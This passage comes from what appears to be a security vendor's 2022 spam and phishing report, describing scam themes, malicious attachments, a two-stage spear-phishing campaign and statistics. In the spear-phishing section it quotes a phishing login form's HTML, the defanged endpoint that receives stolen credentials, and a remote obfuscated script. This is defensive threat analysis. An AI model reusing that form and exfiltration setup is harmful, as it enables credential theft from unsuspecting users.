information.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142636/spam-phishing-report-2022-12-1024x434.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142636/spam-phishing-report-2022-12.png>)\n\nIn Singapore, scammers offered a refund of water supply costs, purportedly because of double billing. An energy or resource crisis was not used as a pretext in this particular case, but refunds were still offered in the name of the water supply authority.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142706/spam-phishing-report-2022-13-1024x810.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142706/spam-phishing-report-2022-13.png>)\n\n### Fake online stores and large vendor phishing\n\nWe see fake websites that imitate large online stores and marketplaces year after year, and 2022 was no exception. Phishing attacks targeted both the customers of globally known retailers and regional players. An attack often started with the victim receiving a link to a certain product supposedly offered at an attractive price, by email, in an instant messaging app, or on a social network. Those who fell for the trick could lose access to their accounts, have their bank card details stolen, or waste the money they wanted to spend on the dirt-cheap item.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142737/spam-phishing-report-2022-14-1024x515.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142737/spam-phishing-report-2022-14.png>)\n\n"Insides" about "private sales" were also used as a lure. Thus, a web page that copied the appearance of a Russian marketplace promised discounts of up to 90% on all items listed on it. The page design did look credible, with the only potential red flags being really low prices and the URL in the address bar not matching the official one.\n\nMany large vendors, notably in the home appliances segment, announced in early spring that they would be pulling out of Russia, which caused a spike in demand. This was reflected in the threat landscape, with fake online stores offering home appliances popping up all over the Russian segment of the internet (also called Runet). Large retailers being out of stock, combined with unbelievably low prices, made these offers especially appealing. The risk associated with making a purchase was to lose a substantial amount of money and never to receive what was ordered.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142817/spam-phishing-report-2022-15-1024x665.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142817/spam-phishing-report-2022-15.jpg>)\n\n### Hijacking of social media accounts\n\nUsers of social media have increasingly focused on privacy lately. That said, curiosity is hard to contain: people want to check out who has been following them, but do so without the other party knowing. Cybercriminals who were after their account credentials offered victims to have their cake and eat it by using some new social media capability. A fake Facebook Messenger page promised to install an update that could change the user's appearance and voice during video calls, and track who has been viewing their profile, among other features. To get the "update", the victim was asked to enter their account credentials, which the scammers immediately took over.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142852/spam-phishing-report-2022-16.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142852/spam-phishing-report-2022-16.png>)\n\nMany Instagram users dream about the Blue Badge, which stands for verified account and is typically reserved for large companies or media personalities. Cybercriminals decided to take advantage of that exclusivity, creating phishing pages that assured visitors their verified status had been approved and all they needed to do was to enter their account logins and passwords.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142919/spam-phishing-report-2022-17-1024x263.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142919/spam-phishing-report-2022-17.png>)\n\nRussia blocked access to both Facebook and Instagram in March 2022, which led to the popularity of Russian social networks and Telegram skyrocketing. This increased usage meant the users' risk of losing personal data was now higher, too. "Well-wishers" who operated scam sites offered to check if Russian social media contained any embarrassing materials on the victim. The scam operators told the users it was possible to find damaging information about every third user of a social network by running a search. If the user agreed to a search to be done for them, they were told that a certain amount of dirty linen indeed had been found. In reality, there was no search \u2014 the scammers simply stole the credentials they requested for the check.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142944/spam-phishing-report-2022-18-1024x295.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142944/spam-phishing-report-2022-18.png>)\n\nOne of the added risks of social media phishing is scammers getting access to both the social media account itself and any linked services.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143155/spam-phishing-report-2022-19.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143155/spam-phishing-report-2022-19.png>)\n\nThe Telegram Premium status provides a range of benefits, from an ad-free experience to an ability to block incoming voice messages, but the subscription costs money. Scammers offered to "test" a Premium subscription free of charge or simply promised to give one for free if the victim entered their Telegram user name and password or a verification code sent by the service, which was exactly what the cybercrooks were after.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143228/spam-phishing-report-2022-20-EN.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143228/spam-phishing-report-2022-20-EN.png>)\n\nOne more phishing campaign targeting Telegram users was arranged to coincide with the New Year's celebration. Scammers created a page on the telegra.ph blogging platform that posted a gallery of children's drawings, encouraging users to vote for their favorites. Scammers sent a link to that page from hacked accounts, asking users to vote for their friends' kids' works. Those who took the bait were directed to a fake page with a login form on it. The cybercriminals were betting on the users to go straight to voting, without checking the authenticity of the drawings, which had been copied from various past years' competition pages, as requests to vote for one's friends' kids are common before public holidays.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143725/spam-phishing-report-2022-21.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143725/spam-phishing-report-2022-21.jpg>)\n\nThe Telegram auction platform named Fragment went live in the October of 2022: it was selling unique usernames. You can become a user by linking your Telegram account or TON wallet. Scammers who were after those account details sent out links to fake Fragment pages. A visitor who tried to buy a username from the fake website was requested to log in. If the victim entered their credentials, the scam operators immediately grabbed those.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143807/spam-phishing-report-2022-22-1024x726.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143807/spam-phishing-report-2022-22.png>)\n\n## Spam in 2022\n\n### The pandemic\n\nUnlike phishing, COVID-themed spam is still a thing. Most of that is "Nigerian-type" scams: millionaires dying from COVID bequeathing their money to treatment and prevention efforts, and to improve the lives of those who have recovered, or Mark Zuckerberg running a special COVID lottery where one can win a million euros even if they are not a Facebook user. Recipients are told that they could claim some IMF money left unallocated because of the pandemic. Others are offered hefty amounts under an anti-recession assistance program.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143915/spam-phishing-report-2022-23-1024x452.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143915/spam-phishing-report-2022-23.png>)\n\nThe amount of spam exploiting the coronavirus theme in some way dropped noticeably during 2022: at the beginning of the year, we were blocking a million of these emails per month, but the figure had shrunk by three times by yearend.\n\n### Contact form spam\n\nThe year 2022 saw cybercriminals abuse contact forms for spam more frequently. In a typical scheme of this kind, scammers find websites that offer registration, contact, or support request forms that do not require the user to be logged in to submit, and do not check the data entered. In some cases, they insert a scam message with a hyperlink in the login or name fields, and in others, add a longer text with images to the message field. Then the attackers add victims' email addresses to the contact fields and submit. When getting a message via a registration or contact form, most websites reply to the user's email address that their request was received and is being processed, their account has been created, and so on. As a result, the person gets an automated reply from an official address of a legitimate organization, containing unsolicited advertisements or a scam link.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13144349/spam-phishing-report-2022-24-1024x433.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13144349/spam-phishing-report-2022-24.png>)\n\nMost scam messages offer a compensation or prize to the recipient. For example, a spam email targeting Russian users promised an equivalent of $190\u20134200 in VAT refunds. To get the money, the victim was offered to open the link in the message. This scheme is a classic: a linked web page requests that the user pay a commission of under a dozen dollars, which is insignificant in comparison to the promised refund. We observed many varieties of contact form money scam: from fuel cards to offers to make money on some online platform.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13145016/spam-phishing-report-2022-25-1024x890.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13145016/spam-phishing-report-2022-25.png>)\n\nScammers took advantage of forms on legitimate sites all around the world. Where spam email in Russian typically played on "prizes" or "earning money", messages in other languages, in addition to offering "prizes", encouraged users to visit "dating sites" \u2014 in fact, populated by bots \u2014 where the victims would no doubt be asked to pay for a premium account.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150322/spam-phishing-report-2022-26-1024x727.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150322/spam-phishing-report-2022-26.png>)\n\nWe blocked upward of a million scam emails sent via legitimate forms in 2022.\n\n### Blackmail in the name of law enforcement agencies\n\nExtortion spam is nothing new. In such emails, attackers usually claim that the recipient has broken the law and demand money. In 2022, these mailings not only continued, but also evolved. For example, there was virtually no text in the messages: the user was either asked to open an attached PDF file to find out more, or they received threats in the form of an image with text. In addition, the geography of mailings widened in 2022.\n\nThe essence of the message, as in similar emails sent earlier, was that a criminal case was going to be opened against the recipient due to allegedly visiting sites containing child pornography.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150404/spam-phishing-report-2022-27-1024x560.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150404/spam-phishing-report-2022-27.png>)\n\nTo avoid serious consequences, the attackers urged the victim to respond as soon as possible to the sender and "settle the matter". Most likely, the scammers would ask for a certain amount of money to be paid in further correspondence for the victim's name to be removed from the "criminal case". In 2022, we blocked over 100,000 blackmail emails in various countries and languages, including French, Spanish, English, German, Russian and Serbian.\n\n### Exploiting the news\n\nSpammers constantly use major world events in their fraudulent schemes. The 2022 geopolitical crisis was no exception. Throughout the year, we saw mailings aimed at English-speaking users proposing transferring money, usually to a Bitcoin wallet, to help the victims of the conflict in Ukraine. Scammers often demand the transfer of money to Bitcoin wallets, as it is more difficult to trace the recipient through cryptocurrency transactions than through the bank ones. Blackmail demanding payment in cryptocurrency used to prevail in spam. Now, attackers have started collecting Bitcoin for charity.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150431/spam-phishing-report-2022-28.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150431/spam-phishing-report-2022-28.png>)\n\nThe news agenda was also used in other scam mailings. For example, in early July, our solutions blocked 300,000 emails where fraudsters were requesting help on behalf of a Russian millionaire, who allegedly wanted to invest money and avoid sanctions. Another mailing said that the European Commission had decided to give away a fund created by Russian oligarchs, and the email recipient might be lucky to get a piece of this pie.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150458/spam-phishing-report-2022-29-1024x328.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150458/spam-phishing-report-2022-29.jpg>)\n\nMore and more "business offers" are appearing among spam mailings, and they exploit the current information agenda. Due to economic sanctions in 2022, enterprising businessmen offered replacements for goods and services from suppliers who left the Russian market. For example, spammers actively advertised services of a company transporting people to Russia. The email text emphasized the fact that many transport companies refused to provide such services.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153541/spam-phishing-report-2022-30-1024x477.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153541/spam-phishing-report-2022-30.png>)\n\nThere were also spam mailings where various companies offered to replace popular international software with Russian equivalents or solutions developed in third countries. In addition, there were spam propositions for intermediary services to open a company or bank account in neighboring countries, such as Armenia, as well as offers of assistance in accepting payments from foreign partners.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153600/spam-phishing-report-2022-31-1024x586.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153600/spam-phishing-report-2022-31.png>)\n\nThe shortage of printer paper in Russia in March and April 2022 spawned a wave of related ads offering paper at discount prices.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153622/spam-phishing-report-2022-32-1024x366.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153622/spam-phishing-report-2022-32.png>)\n\nSpammers in 2022 also actively marketed their promotional mailing services as alternative advertising to unavailable promotion via platforms such as Instagram. For example, in April we blocked around a million of such mailings.\n\nAgainst the backdrop of sanctions and the accompanying disruption of supply chains, there has been an increase in spam offering goods and services from Chinese suppliers. In 2022, our filter blocked more than 3.5 million emails containing such offers, and the number of them was growing, from around 700,000 in the first quarter to more than a million in the fourth.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153708/spam-phishing-report-2022-33-1024x571.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153708/spam-phishing-report-2022-33.png>)\n\n### Spam with malicious attachments\n\nEmployees shifting to remote work during the pandemic and the associated growth of online communications spurred the active development of various areas of phishing, both mass and targeted. Attackers have become more active in imitating business correspondence, not only targeting HR-specialists and accountants, as before the pandemic, but also employees in other departments. In 2022, we saw an evolution of malicious emails masquerading as business correspondence. Attackers actively used social engineering techniques in their emails, adding signatures with logos and information from specific organizations, creating a context appropriate to the company's profile, and applying business language. They also actively exploited off the current news agenda and mentioned real employees from the company supposedly sending the emails. Spammers faked their messages as internal company correspondence, business correspondence between different organizations, and even as notifications from government agencies.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153731/spam-phishing-report-2022-34-1024x508.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153731/spam-phishing-report-2022-34.png>)\n\nMasking malicious emails as business correspondence has become a major trend in malicious spam in 2022. Attackers tried to convince the recipient that it was a legitimate email, such as a commercial offer, a request for the supply of equipment, or an invoice for the payment of goods. For example, throughout the year, we encountered the following scheme. Attackers gained access to real business correspondence (most likely by stealing correspondence from previously infected computers) and sent malicious files or links to all of its participants in response to the previous email. This trick makes it harder to keep track of malicious emails, and the victim is more likely to fall for it.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153756/spam-phishing-report-2022-35-1024x626.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153756/spam-phishing-report-2022-35.png>)\n\nIn most cases, either the [Qbot](<https://securelist.com/qakbot-technical-analysis/103931/>) Trojan or [Emotet](<https://securelist.com/emotet-modules-and-recent-attacks/>) was loaded when the malicious document was opened. Both can be used to steal user data, collect information about the corporate network, and spread additional malware, such as ransomware. Qbot also allows you to gain access to emails and steal them for further attacks.\n\nMailings imitating notifications from various ministries and other government organizations have become more frequent in the Runet. Emails were often designed to take into account the specific activities of the organizations they were pretending to be. The sender's addresses copied the logic of email addresses in the relevant agencies, and the malicious attachment was disguised as some kind of specialized document, such as "key points of the meeting". For example, malicious code was found in one of these mailings that exploited a vulnerability in the Equation Editor module, the formula editor in Microsoft Office.\n\nThe perpetrators did not ignore the news agenda. In particular, the malware was distributed under the guise of call-up "as part of partial mobilization" or as a "new solution" to safeguard against possible threats on the internet "caused by hostile organizations".\n\nIn the second case, the program installed on victim's computer was in fact a crypto-ransomware Trojan.\n\n## Two-stage spear phishing using a known phish kit\n\nIn 2022, we saw an increase in spear (or targeted) phishing attacks targeting businesses around the world. In addition to typical campaigns consisting of one stage, there were attacks in several stages. In the first email, scammers in the name of a potential client asked the victim to specify information about its products and services. After the victim responds to this email, the attackers start a phishing attack.\n\nKey facts:\n\n * Attackers use fake Dropbox pages created using a well-known phishing kit\n * The campaign targets the sales departments of manufacturers and suppliers of goods and services\n * Attackers use SMTP IP addresses and _From_ domains provided by Microsoft Corporation and Google LLC (Gmail)\n\n### Statistics\n\nThe campaign began in April 2022, with malicious activity peaking in May, and ended by June.\n\n_Number of emails related to a two-step targeted campaign detected by Kaspersky solutions ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161029/01-en-spam-report-2022-diagrams.png>))_\n\n### How a phishing campaign unfolds\n\nAttackers send an email in the name of a real trade organization requesting more information about the victim company's products. The email text looks plausible and has no suspicious elements, such as phishing links or attachments. A sender's email address from a free domain, like gmail.com, may raise doubts. The email on the screenshot below is sent from an address in this domain, and the company name in the _From_ field is different to its name in the signature.\n\n[![Example of the first email](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153835/spam-phishing-report-2022-36-1024x498.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153835/spam-phishing-report-2022-36.jpg>)\n\n**_Example of the first email_**\n\nIt is worth noting that the use of free domains is not typical for spear phishing in the name of organizations, because such domains are rarely used in business. Most often in targeted attacks, attackers either use [spoofing of the legitimate domain](<https://securelist.com/email-spoofing-types/102703/>) of the organization they are pretending to be, or register domains similar to the original one. In addition, Google and Microsoft are pretty quick in blocking email addresses spotted sending spam. This is the most likely reason why attackers used different addresses in the _From_ header (where the email came from) and _Reply-to_ header (where the reply will go when clicking "Reply" in your email client). This means the victim responds to another address, which may be located in another free domain, such as outlook.com. The address in the _Reply-to_ header is not used for spam, and correspondence with it is initiated by the victim, so it is less likely to be blocked quickly.\n\nAfter victims respond to a first email, attackers send a new message, asking them to go to a file-sharing site and view a PDF file with a completed order, which can be found via the link.\n\n[![An email with a phishing link](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153858/spam-phishing-report-2022-37-1024x642.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153858/spam-phishing-report-2022-37.jpg>)\n\n**_An email with a phishing link_**\n\nBy clicking the link, the user is taken to a fake site generated by a well-known phishing kit. It is a fairly simple tool that generates phishing pages to steal credentials from specific resources. Our solutions blocked fake WeTransfer and Dropbox pages created with this kit.\n\n[![A fake WeTransfer page created using the same phish kit as the target campaign sites](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153925/spam-phishing-report-2022-38-1024x625.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153925/spam-phishing-report-2022-38.jpg>)\n\n**_A fake WeTransfer page created using the same phish kit as the target campaign sites_**\n\nIn the phishing campaign described above, the phishing site mimics a Dropbox page with static file images and a download button. After clicking any element of the interface, the user is taken to a fake Dropbox login page that requests valid corporate credentials.\n\n[![A fake Dropbox page](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153950/spam-phishing-report-2022-39-1024x650.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153950/spam-phishing-report-2022-39.png>)\n\n**_A fake Dropbox page_**\n\n[![Login page with a phishing form](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154022/spam-phishing-report-2022-40.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154022/spam-phishing-report-2022-40.jpg>)\n\n**_Login page with a phishing form_**\n\nWhen victims attempt to log in, their usernames and passwords are sent to https://pbkvklqksxtdrfqkbkhszgkfjntdrf[.]herokuapp[.]com/send-mail.\n \n \n <form name=\"loginform\">\n <div class=\"form-group\">\n <label for=\"\">Email Address</label>\n <input type=\"email\" id=\"email\" class=\"form-control\" name=\"email\" placeholder=\"email Address\">\n <div class=\"email-error\"></div>\n </div>\n <div class=\"form-group\">\n <label for=\"\">Password</label>\n <input type=\"password\" id=\"password\" class=\"form-control\" name=\"password\" placeholder=\"Password\">\n <div class=\"password-error\"></div>\n </div>\n <div class=\"form-group btn-area\">\n <button class=\"download-btn\" id=\"db\" type=\"submit\">Download</button>\n </div>\n </form>\n </div>\n <script src=\"https://firebasestorage.googleapis.com/v0/b/linktopage-c7fd6.appspot.com/o/obfuscated.js?alt=media&token=1bb73d28-53c8-4a1e-9b82-1e7d62f3826b\"></script>\n\n**_HTML representation of a phishing form_**\n\n### Victims\n\nWe have identified targets for this campaign around the world, including the following countries: Russia, Bosnia and Herzegovina, Singapore, USA, Germany, Egypt, Thailand, Turkey, Serbia, Netherlands, Jordan, Iran, Kazakhstan, Portugal, and Malaysia.\n\n## Statistics: spam\n\n### Share of spam in mail traffic\n\nIn 2022, an average of 48.63% of emails worldwide were spam, representing a 3.07 p.p. increase on 2021. Over the course of the year, however, the share of spam in global email traffic has gradually declined, from 51.02% in the first quarter to 46.16% in the fourth.\n\n_Share of spam in global email traffic, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161102/02-en-spam-report-2022-diagrams.png>))_\n\nThe most active month in terms of spam was February 2022, with junk traffic accounting for 52.78% of all email correspondence. June was in second place (51.66%). December was the calmest, only 45.20% of emails in this month were spam.\n\nOn Runet, the proportion of spam in email traffic is generally higher than worldwide. In 2022, an average of 52.44% of emails were junk mailings. At the same time, the trend for a gradual shift in ratio in favor of legitimate correspondence can also be seen. We saw the largest share of spam in Runet in the first quarter, with 54.72% of all emails, and by the fourth quarter it had dropped to 49.20%.\n\n_Proportion of spam in Runet email traffic, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161132/03-en-spam-report-2022-diagrams.png>))_\n\nEven though the second quarter (53.96%) was quieter in terms of spam than the first, the most active month in the Russian segment of the internet was June (60.16%). Most likely, the share of spam in June, both in Russia and globally, was influenced by the surge in mailings with offers from Chinese factories that we observed in that month. And the quietest month in Runet was December (47.18%), the same as globally.\n\n### Countries and territories \u2014 sources of spam\n\nIn 2022, the share of spam from Russia continued to grow, from 24.77% to 29.82%. Germany (5.19%) swapped places with mainland China (14.00%), whose share increased by 5.27 percentage points. Third place is still held by the United States (10.71%).\n\n_TOP 20 countries and territories \u2014 sources of spam, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161204/04-en-spam-report-2022-diagrams.png>))_\n\nThe Netherlands remained in fifth place (3.70%), its share decreased compared to 2021. Sixth and seventh places went to Japan (3.25%) and Brazil (3.18%), whose shares rose by 0.89 and 3.77 p.p., respectively. Next come the UK (2.44%), France (2.27%) and India (1.82%).\n\n### Malicious mail attachments\n\nIn 2022, our Mail Anti-Virus detected 166,187,118 malicious email attachments. That's an increase of 18 million from the previous year. This component caused most triggers in March, May, and June 2022.\n\n_Number of Mail Anti-Virus hits, January \u2014 December 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161240/05-en-spam-report-2022-diagrams.png>))_\n\nThe most common malicious email attachments in 2022, as in 2021, were [Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) Trojan stealers (7.14%), whose share decreased slightly. [Noon](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) spyware (4.89%) moved up to second place, and [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) Trojans (4.61%) spreading as archived electronic documents moved down to third place. The fourth most common malware were vulnerability exploits [CVE-2018-0802](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2018-0802/>) (4.33%) in Microsoft Equation Editor. In 2022, attackers used them significantly more often than [CVE-2017-11882](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) exploits in the same component (1.80%). This vulnerability was more widespread in 2021 and has now dropped to tenth place.\n\n_TOP 10 malware families spread by email attachments in 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161308/06-en-spam-report-2022-diagrams.png>))_\n\n[ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) Trojans (3.27%), sent in the form of disk images, moved up to number five, and the sixth most common was the [Guloader](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Guloader/>) downloader family (2.65%), which delivers remotely controlled malware to victims' devices. They are closely followed by the [Badur](<https://threats.kaspersky.com/en/threat/Trojan.PDF.Badur/>) family (2.60%), PDF files containing links to web resources with questionable content, and in eighth place is the infamous [Emotet](<https://securelist.com/emotet-modules-and-recent-attacks/106290/>) botnet (2.52%). Law enforcement shut this down in early 2021, but by fall, attackers had restored the infrastructure and were actively distributing it in 2022. More recently, Emotet has been used to deliver other malware to victims' devices, particularly ransomware. The ninth most popular family was [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) (2.10%), which creates malicious tasks in the task scheduler.\n\n_TOP 10 types of malware spread by email attachments in 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161339/07-en-spam-report-2022-diagrams.png>))_\n\nThe list of the most common malware sent via email usually corresponds to the list of families. As in 2021, attackers mostly distributed the same instances from the TOP 10 families.\n\n### Countries and territories targeted by malicious mailings\n\nSpain remains the leader in terms of blocked malicious attachments in 2022 (8.78%), which is a slight decrease compared to 2021 (9.32%). The share of Russia (7.29%), on the other hand, increased slightly. Third place went to Mexico (6.73%), and fourth place to Brazil (4.81%), whose share was virtually unchanged from the previous reporting period.\n\n_TOP 20 countries and territories targeted by malicious mailings, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161409/08-en-spam-report-2022-diagrams.png>))_\n\nIn Italy, 4.76% of all detected malicious attachments were blocked in 2022. The country is followed by Vietnam (4.43%) and Turkey (4.31%). The percentage of Mail Anti-Virus detections on computers of users from Germany (3.85%) continued to decrease. The share in the United Arab Emirates (3.41%) also decreased slightly, dropping to ninth place, while Malaysia (2.98%) remained in tenth place.\n\n## Statistics: phishing\n\nIn 2022, the number of phishing attacks increased markedly. Our Anti-Phishing system prevented 507,851,735 attempts to follow a phishing link, roughly double the number in 2021.\n\n### Map of phishing attacks\n\nIn 2022, the geography of phishing attacks changed dramatically. Attempts to click phishing links were most often blocked on devices from Vietnam (17.03%). In 2021, this country was not among the TOP 10 most attacked countries and territories. Macau is in second place (13.88%), also absent from last year's ranking. Madagascar is in third place (12.04%), which was seventh in 2021. In addition to Vietnam and Macau, Algeria (11.05%), Malawi (10.91%) and Morocco (10.43%) appeared at the top of the list of most attacked countries and territories. Ecuador (11.05%) moved up to fifth place, while Brunei (10.59%) dropped one place to seventh. Brazil (10.57%) and Portugal (10.33%) moved from first and third places to eighth and tenth, respectively, and France, which was second in 2021, left the TOP 10.\n\nTOP 10 countries and territories by share of attacked users:\n\n**Country/territory** | **Share of attacked users*** \n---|--- \nVietnam | 17.03% \nMacau | 13.88% \nMadagascar | 12.04% \nAlgeria | 11.05% \nEcuador | 11.05% \nMalawi | 10.91% \nBrunei | 10.59% \nBrazil | 10.57% \nMorocco | 10.43% \nPortugal | 10.33% \n \n**_* Share of users encountering phishing out of the total number of Kaspersky users in that country/territory, 2022_**\n\n### Top-level domains\n\nAs in previous years, the majority of phishing pages were hosted in the COM domain zone, but its share almost halved, from 31.55% to 17.69%. Zone XYZ remained in second place (8.79%), whose share also decreased. The third most popular domain among attackers was FUN (7.85%), which had not previously received their attention. The domain is associated with entertainment content, which is perhaps what attracted fraudsters to it.\n\n_Most frequent top-level domains for phishing pages in 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161441/09-en-spam-report-2022-diagrams.png>))_\n\nDomains ORG (3.89%) and TOP (1.80%) swapped places relative to 2021 but remained in fourth and fifth places. In addition to this, the top ten domain zones in most demand among cybercriminals included: RU (1.52%), COM.BR (1.13), DE (0.98%), CO.UK (0.98%) and SE (0.92%).\n\n### Organizations under phishing attacks\n\n_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database._\n\nIn 2022, pages impersonating delivery services had the highest percentage of clicks on phishing links blocked by our solutions (27.38%). Online stores (15.56%), which were popular with attackers during the pandemic, occupied second place. Payment systems (10.39%) and banks (10.39%) ranked third and fourth, respectively.\n\n_Distribution of organizations targeted by phishers, by category, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161508/10-en-spam-report-2022-diagrams.png>))_\n\nThe share of global internet portals (8.97%) almost halved, with almost as many phishing resources targeting users of smaller web services (8.24%). Social networks (6.83%), online games (2.84%), messengers (2.02%) and financial services (1.94%) round complete the TOP 10 categories of sites of interest to criminals.\n\n### Hijacking Telegram accounts\n\nIn 2022, our solutions stopped 378,496 phishing links aimed at hijacking Telegram accounts. Apart from a spike in phishing activity throughout June, when the number of blocked links exceeded 37,000, the first three quarters were relatively quiet. However, by the end of the year, the number of phishing attacks on the messenger's users increased dramatically to 44,700 in October, 83,100 in November and 125,000 in December. This increase is most likely due to several large-scale Telegram account hijacking campaigns that we [observed in late 2022](<https://www.kaspersky.ru/blog/telegram-takeover-contest/34472/>) (article in Russian).\n\n_Number of clicks on phishing links aimed at hijacking a Telegram account worldwide, and in Russia specifically, January \u2014 December 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161540/11-en-spam-report-2022-diagrams.png>))_\n\nIt is of note that the majority of phishing attacks were aimed at users from Russia. While in the first months of 2022 their share was approximately half of the total number of attacks worldwide, since March 70\u201390% of all attempts to follow phishing links by Telegram users were made by Russian users.\n\n### Phishing in messengers\n\n_Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them._\n\nIn 2022, our mobile solution blocked 360,185 attempts to click on phishing links from messengers. Of these, 82.71% came from WhatsApp, 14.12% from Telegram and another 3.17% from Viber.\n\n_Distribution of links blocked by the Safe Messaging component, by messenger, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161612/12-en-spam-report-2022-diagrams.png>))_\n\nPhishing activity on WhatsApp is down slightly since 2021. On average, the Safe Messaging component blocked 816 clicks on fraudulent links per day. The first half of the year was the most turbulent, and by the third quarter, phishing activity in the messenger had dropped sharply.\n\n[![Dynamics of phishing activity on WhatsApp in 2022 \$weekly number of detected links 